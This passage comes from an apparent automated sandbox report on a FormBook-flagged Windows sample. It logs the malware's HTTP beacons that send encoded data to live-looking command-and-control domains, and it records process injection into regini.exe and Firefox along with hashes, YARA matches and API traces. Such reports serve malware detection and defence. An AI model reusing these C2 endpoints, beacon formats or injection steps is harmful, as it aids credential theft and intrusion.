                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            42 | 192.168.2.10 | 50023 | 68.66.226.92 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:24:58.610086918 CET | 697 | OUT | POST /bokt/ HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.717hy.net
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.717hy.net/bokt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=kqa2EAJEmVzzKRPHZEP/4wxW+UfXBOqwllngBpyEUDDOsKdGsNdBZu7EsoP6247nW5n9Bv6opc4j/Weih0gFOQqgLyk6iT2H7AQD/H1mt24BVqI1IgMo+OJANvnv44h2rJ/IYcsZOtBH+bbz0dP8nk7316rt0+96QNvV2jgyT6v4Pa84l8TE7ruUujgWiL2s81aBkoOe6d4Xpe5ywQ==
                                                                            Nov 24, 2024 08:24:59.880987883 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:24:59 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            43 | 192.168.2.10 | 50024 | 68.66.226.92 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:25:01.271647930 CET | 1710 | OUT | POST /bokt/ HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.717hy.net
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.717hy.net/bokt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:25:02.505578041 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:25:02 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            44 | 192.168.2.10 | 50025 | 68.66.226.92 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:25:03.934626102 CET | 419 | OUT | GET /bokt/?GX6Lp2F=poyWHxU0sXOGQX6eVUDBw1lp5X+IA5CiyB6gAIqfCj73s4Aj6MIiBsrDm9nDs7uyJKeVN/2spsRHx0Xh4EIWPHPhLhUxqk/k6TQj/zpRoAwTN6gmaA==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:25:05.179421902 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:25:04 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            45 | 192.168.2.10 | 50026 | 172.67.186.192 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:25:10.737601042 CET | 694 | OUT | POST /cxxv/ HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.izmirescortg.xyz
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.izmirescortg.xyz/cxxv/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=SGKcoEWBskCAdR9J/3kB6ZO5EIDUBY5VgbS8+H2gN9flS1Wi8BnvndJBNZVKSrIir9+8cPLsLjhdG2WX2roYqjANbY+u3JAwD+80J8CjNLELDOW9YDjosaJJD7qnZqVYRsF8NNEWau8k7uRTn5UzGEJOmzFh+U+0KTof2OHU21rhxOOje7oL+udnwbRc
                                                                            Nov 24, 2024 08:25:11.992429972 CET | 1066 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:11 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucg2Xsi5P7ooaC9F%2BKPYiH20vHxgRauK%2BUnIPS%2FrURGRdHRJxup9d2t%2BtBUrQFO%2F5Z6%2Fkqsw%2Fu6B9vSELzNhmAyJkVbJyN0DdNufKjJImqUYTZuE3KbnQ4jIu0fVTjjCo6cs9P4xDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a9e3c8947291-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            46 | 192.168.2.10 | 50027 | 172.67.186.192 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:25:13.410346985 CET | 718 | OUT | POST /cxxv/ HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.izmirescortg.xyz
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.izmirescortg.xyz/cxxv/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=SGKcoEWBskCAczpJ+UMBzZO+YYDUL45Rgbe8+GyKNLnlcwqi9DfvkdJBH5VLN7I5r9y0cKrsLnBdG3mX2c0bqzALT4+g6pAwD+80J8GFNLsLD/m9KQ7rwqJGE7qnK6VcRsEpNPwsatIk7tFTnrw0NEJU4DEI2hbeEAYmpefnjDP12vzkPqJctZBp+dk2wVle88tbg/e3Ul99vXxxTA==
                                                                            Nov 24, 2024 08:25:14.748753071 CET | 1064 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:14 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVgdUfRKAi8K4pE46ZEoIFJqiYcPB8hm%2BIlyP8CkeMZOH7PHSE2W%2FhGA1y%2F98gr%2Bt6mcymguZ8gzoHxDxPCa2NrlffQKXVj8bg60GNO9qsLfULohGy7qA2u8vjmi%2FTOVGWt%2BKGvKQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a9f5093f0c90-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1447&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            47 | 192.168.2.10 | 50028 | 172.67.186.192 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:25:16.102524996 CET | 1731 | OUT | POST /cxxv/ HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.izmirescortg.xyz
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.izmirescortg.xyz/cxxv/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:25:17.469991922 CET | 1064 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:17 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fexONy%2Bob8N63dYQRWbXx8Ca4d62lIxKAfR4uX7H2GjwdH1u445ulTczFMmDoQUFm48ywJX3yH9AQJ8Xsw1bJBUc%2F2NGKbPZj%2BYChPH03l3FcWm2uH2ZhlWqT4gbqQ9Pdd7x1rFOMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77aa05f9ce4210-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1566&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1731&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            48 | 192.168.2.10 | 50029 | 172.67.186.192 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:25:19.649274111 CET | 426 | OUT | GET /cxxv/?H8=BpFD-28hKhrD&GX6Lp2F=fEi8rzaYrE/XGRR50VEK8uqDXr7AK/1Kw/XUmUqnafTsdiSkrhbsiNoZNrJqJtIqpPiDC/W6aTtfGFbS6ow8ixkLbruB9JsRPd8yCP6sEcEmGu+VbQ== HTTP/1.1
                                                                            Host: www.izmirescortg.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:25:20.158279896 CET | 1108 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:25:20 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIBk17vPXbDECxtpzTCXTjUW6BZ7IaOe6646%2Bz0Rzdkumw10X%2BR%2FN3XoZDFOZpYWjY3uB6EbYq%2BUpF5SM3EVAXcqg3h22CJ%2FtWQzav437hw2pm%2BPIwdrn9smBJmjq%2FNyO7qHkSpGrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77aa16cad4c47f-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                                            Target ID:1
                                                                            Start time:02:21:10
                                                                            Start date:24/11/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x240000
                                                                            File size:1'026'560 bytes
                                                                            MD5 hash:DF31A2CCD06E0F1075F7280D156F5237
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:02:21:11
                                                                            Start date:24/11/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0xc80000
                                                                            File size:1'026'560 bytes
                                                                            MD5 hash:DF31A2CCD06E0F1075F7280D156F5237
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:02:21:25
                                                                            Start date:24/11/2024
                                                                            Path:C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe"
                                                                            Imagebase:0xc40000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:02:21:27
                                                                            Start date:24/11/2024
                                                                            Path:C:\Windows\SysWOW64\regini.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                            Imagebase:0x1a0000
                                                                            File size:41'472 bytes
                                                                            MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:02:21:39
                                                                            Start date:24/11/2024
                                                                            Path:C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe"
                                                                            Imagebase:0xc40000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:10
                                                                            Start time:02:21:52
                                                                            Start date:24/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff613480000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:9.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:207
                                                                              Total number of Limit Nodes:7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 97e68e0bb66d8379f5f0383557d010c69c851ea18a414e1354d647e00c8662a3
                                                                              • Instruction ID: af97e6ed438c2c8a405cbe6727e3fd5898266b1a4eac99e6e334052f0f1ba582
                                                                              • Opcode Fuzzy Hash: 97e68e0bb66d8379f5f0383557d010c69c851ea18a414e1354d647e00c8662a3
                                                                              • Instruction Fuzzy Hash: 713299B0B053049FDB59DB65C550BAEBBF6AF89300F2444A9E546EB3A0DB35ED01CB60

                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BA7D86
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: c1d30cc012690582cdf280a4e080121f70e2f35fde61fcec4719313e5395f2ae
                                                                              • Instruction ID: e8a0c2df33b8ae82bae9e78614fef3860e9d7d2d5a3db79c5967ad69ae49884f
                                                                              • Opcode Fuzzy Hash: c1d30cc012690582cdf280a4e080121f70e2f35fde61fcec4719313e5395f2ae
                                                                              • Instruction Fuzzy Hash: CBA18DB5D083199FEB60CF69C840BEEBBB2FF48310F1485A9D808A7240DB759985CF91

                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BA7D86
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 590eef312ecd18b2460300f82a5f29cda402ad173694e148167e12bdbd235bd5
                                                                              • Instruction ID: b1dba43fcea60c2339af94eccf9f3bd56b5112227499c074da33ebef1ed1a2a8
                                                                              • Opcode Fuzzy Hash: 590eef312ecd18b2460300f82a5f29cda402ad173694e148167e12bdbd235bd5
                                                                              • Instruction Fuzzy Hash: AD916DB5D083198FEB64CF69C840BEDBBB2FF48310F1485A9D848A7240DB759985CF91

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0266AF5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 8b3fff5984dd59757a458729fc6d1de4b3a713fe01809f60f682875e3e1cdce6
                                                                              • Instruction ID: f79209d64cf7e3676454d7a09b17cc6a4a22e0b125a538607cbc1070b4d1072c
                                                                              • Opcode Fuzzy Hash: 8b3fff5984dd59757a458729fc6d1de4b3a713fe01809f60f682875e3e1cdce6
                                                                              • Instruction Fuzzy Hash: 79712570A00B458FDB24DFA9D04476ABBF5FF88204F00892DD49AE7B90DB75E949CB91

                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 026659A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 026659A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BA7958
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BA7958
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0266D5B6,?,?,?,?,?), ref: 0266D677
                                                                              Memory Dump Source
